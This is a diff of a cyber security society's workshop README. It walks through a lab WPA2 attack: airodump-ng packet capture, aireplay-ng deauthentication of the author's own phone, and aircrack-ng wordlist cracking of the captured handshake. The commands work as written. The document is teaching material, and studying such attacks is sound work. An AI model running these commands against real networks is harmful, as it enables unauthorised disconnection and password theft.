LucasMcVey/Flinders-Cyber-Security-Society/README.md

 ### De-Auth Attack

- * `sudo airodump-ng -c 11 \-\-bssid B0\-95\-75\-5C\-3B\-94 \-w psk wlan0 ` - this captures packets for the CyberSec accesspoint and saves it locally to a file named psk
+ * `sudo airodump-ng -c 11 --bssid B0-95-75-5C-3B-94 -w psk wlan0 ` - this captures packets for the CyberSec accesspoint and saves it locally to a file named psk

- * `sudo aireplay-ng \-0 10 \-a B0:95:75:5C:3B:94 \-c 0C:8D:CA:A6:93:8D wlan0 ` - This sends 10 deauthentication packets to my phone which will disconnect from the Access Point and automatically reconnect.
+ * `sudo aireplay-ng -0 10 -a B0:95:75:5C:3B:94 -c 0C:8D:CA:A6:93:8D wlan0 ` - This sends 10 deauthentication packets to my phone which will disconnect from the Access Point and automatically reconnect.
 The reauthenication process for the wpa2 handshake is captured and saved locally

 ![](img/WifiHackingWorkshop6.png)

 ### Cracking Password
 Using the previous wpa2 handshake capture we can brute force the password using a passwordlist.
 I created one called passwordlist with the password of Password1 in it for lab demostration purpose.
 But Kali has default wordlists in the /usr/share/wordlists directory

- * `aircrack-ng \-w passwordlist\.txt psk\-02\.cap  `- This is what is used to crack the password.
+ * `aircrack-ng -w passwordlist.txt psk-02.cap `- This is what is used to crack the password.

 ![](img/WifiHackingWorkshop7.png)